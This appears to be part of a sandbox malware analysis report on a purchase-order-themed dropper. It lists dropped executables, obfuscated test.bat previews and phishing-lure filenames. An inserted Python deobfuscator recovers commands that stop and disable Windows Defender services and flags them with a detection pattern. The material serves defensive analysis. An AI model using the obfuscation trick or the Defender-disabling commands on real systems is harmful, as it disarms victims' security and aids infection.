                                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                    Malicious:false
                                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):22336
                                                                                    Entropy (8bit):5.600727062315433
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ltCDX0qZhF4/RY4Kn4jultI2D7Y9gxSJUeRe1BMrmb4SRV7rSLkC564I+pzg:0fFiu4K4CltJ3xXeNqFivE
                                                                                    MD5:73198456EC9CD93402A12C67F75EEBD5
                                                                                    SHA1:8A2B76B9D5F123ABE2F1F275AFAD29E5F5D2A9C4
                                                                                    SHA-256:D658934AD7CC52739BA1A2808A53EDEAA5F3C227C8192FF9597F848AF26B8871
                                                                                    SHA-512:A63A63DA0AF86F295BE0D58ADE3738C956FDE8B3EEE41A5DE76E9AFEA1C9034F42982D1660EA6FB080AE682008D1FE666DFA4B73E61552A9110B1A50353C628B
                                                                                    Malicious:false
                                                                                    Preview: @...e.......................S.F.&.......=............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
Antivirus:
• Metadefender, Detection: 3%
• ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: RFQ-034.exe, Detection: malicious
• Filename: Payment Slip.exe, Detection: malicious
• Filename: Revised Invoice No CU 7035.exe, Detection: malicious
• Filename: Sales_Order description.exe, Detection: malicious
• Filename: Outstanding invoices.exe, Detection: malicious
• Filename: Q88_Bulk Carrier.exe, Detection: malicious
• Filename: Payment _Slip copy.exe, Detection: malicious
• Filename: MV. HUA KAI V-2023.exe, Detection: malicious
• Filename: Order_April shipment.exe, Detection: malicious
• Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious
• Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious
• Filename: TT SWIFT COPY.exe, Detection: malicious
• Filename: PO75773937475895377.exe, Detection: malicious
• Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious
• Filename: Download Report.06.05.2021.exe, Detection: malicious
• Filename: Outstanding invoices.exe, Detection: malicious
• Filename: IMG_767893434432.exe, Detection: malicious
• Filename: VMtEguRH.exe, Detection: malicious
• Filename: SHIPPING DOCS - MV. SN QUEEN.exe, Detection: malicious
• Filename: MT CAPE AZALEA V219 PENAVICO 13-10-20.exe, Detection: malicious
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
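The test.bat preview above is a common batch obfuscation: every command is split by references to environment variables with random names (%nmb%, %lvjgxfcm%, ...). cmd.exe expands an undefined variable to nothing when it parses a batch file, so the script runs unchanged while string scanners see only gibberish. The following Python deobfuscator is an added example by the editor, not code from the sandbox report or from the sample; it copies the preview text (CRLF restored, the fifth command truncated in the preview so its dangling token is dropped) and applies the same expansion rule cmd.exe does, then flags the recovered commands that stop or disable Defender services. The list of Defender service names and cmdlets in the flagging pattern is the editor's own, not something the report states.

```python
import re
from typing import Dict, List, Optional

# Head of the dropped test.bat, copied from the "Preview" field of the
# C:\Users\user\AppData\Local\Temp\6c8082d4-...\test.bat entry in this report.
# The preview renders each CRLF as "..", restored here as "\r\n"; the fifth
# command is cut off in the preview, so this sample stops at its last complete
# token (a constructed truncation of the real script, not the full file).
OBFUSCATED_BAT = (
    "@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%\r\n"
    "%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p"
    "%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e"
    "%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%\r\n"
    "%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i"
    "%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f"
    "%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r"
    "%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e"
    "%wlhzjhxuzh%d%roqtalnv%\r\n"
    "%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p"
    "%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%\r\n"
    "%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f"
    "%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% "
)

# One cmd.exe variable reference: "%%" is the escape for a literal percent sign,
# otherwise a name closed by a second "%". Substitution syntax (%VAR:a=b%) and
# argument references (%1, %~dp0) are not modelled; the dropped script uses neither.
_REF = re.compile(r"%%|%([A-Za-z0-9_]+)%")


def deobfuscate_batch(text: str, env: Optional[Dict[str, str]] = None) -> str:
    """Expand %NAME% references the way cmd.exe does while parsing a batch file:
    a defined name becomes its value, an undefined name becomes the empty string.
    The obfuscator relies on that rule, so every gibberish %name% simply vanishes."""
    defined = {k.upper(): v for k, v in (env or {}).items()}  # cmd names are case-insensitive

    def expand(m):
        if m.group(0) == "%%":
            return "%"
        return defined.get(m.group(1).upper(), "")

    return _REF.sub(expand, text)


def recover_commands(obfuscated: str, env: Optional[Dict[str, str]] = None) -> List[str]:
    """Deobfuscate and return the non-empty command lines, whitespace-trimmed."""
    return [ln.strip() for ln in deobfuscate_batch(obfuscated, env).splitlines() if ln.strip()]


# Editor's pattern (an assumption, not from the report): sc.exe stopping,
# reconfiguring or deleting the Defender service (WinDefend), the Defender ATP
# sensor (Sense) or the network inspection service (WdNisSvc), and the
# PowerShell cmdlets used to add exclusions or switch protection features off.
_DEFENDER_TAMPER = re.compile(
    r"\bsc(\.exe)?\s+(stop|config|delete)\s+(windefend|sense|wdnissvc)\b"
    r"|\b(set|add)-mppreference\b",
    re.IGNORECASE,
)


def defender_tampering(commands: List[str]) -> List[str]:
    """Return the recovered commands that tamper with Windows Defender."""
    return [c for c in commands if _DEFENDER_TAMPER.search(c)]


if __name__ == "__main__":
    cmds = recover_commands(OBFUSCATED_BAT)
    for c in cmds:
        print(c)
    print("Defender tampering:", defender_tampering(cmds))
```

Run stand-alone, the block prints the recovered script head (@echo off, sc stop windefend, sc config windefend start= disabled, sc stop Sense, sc config) and flags the three service commands. Passing a real environment dict to deobfuscate_batch matters for samples that mix genuine references such as %TEMP% into the noise; with an empty dict those would be stripped as well and the recovered command would be wrong.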
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_autfnfbp.5ke.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dva0twzw.csn.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu12tuhx.b3d.ps1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5lfjoqp.nj0.psm1
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview: 1
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):91000
                                                                                    Entropy (8bit):6.241345766746317
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 3%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat
                                                                                    Process:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8399
                                                                                    Entropy (8bit):4.665734428420432
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                    Malicious:false
                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32008
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    MD5:27233176A2A979195B01A53EC16C7631
                                                                                    SHA1:0EF424D2000F18E6B83473535BF85D22ED9AB79B
                                                                                    SHA-256:397A62FC978F7A97A87CAAF9C35E98E4A053DE4E786BEEE73A6C1AC0E99C9FC9
                                                                                    SHA-512:F8A620CA97069FA352621BB76C1C83BDEBB7692F0B80DE2E9D273EBB718D4D4BA412F2B057580023BD646DA09647D82E035F6C2AD28E59200B7433FD1AB2D0E7
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 15%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@.................................(}..S....................h............................................................... ............... ..H............text....]... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................`}......H........5...H...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....rE..p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....rE..p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........rI..p.+..........s......%r_..p .........%.r...p.%.r...p.%.r...p
                                                                                    C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.dfbKEN5N.20210408122415.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.399277409284378
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZVhtNxqDo1ZeZFhtNxqDo1ZtMGkjZWhtNxqDo1ZQ100DZU:u
                                                                                    MD5:B240F22E63DF44CA4B62678B85131460
                                                                                    SHA1:C119F7AAAB0B4B6446C09C72634F7944540742E4
                                                                                    SHA-256:94293DB0624CC339E38D1231CA91500CAC8F27911A4409441F69EE1B2077782B
                                                                                    SHA-512:E66C91C83D3AA181E1914D0759B936E4EAA38E2B97677564963D071CE13C97B94FB5CA2CAAD5AFE56CD0E715F88A8B0A71A888B8425D42506B6D68588F7E395B
                                                                                    Malicious:false
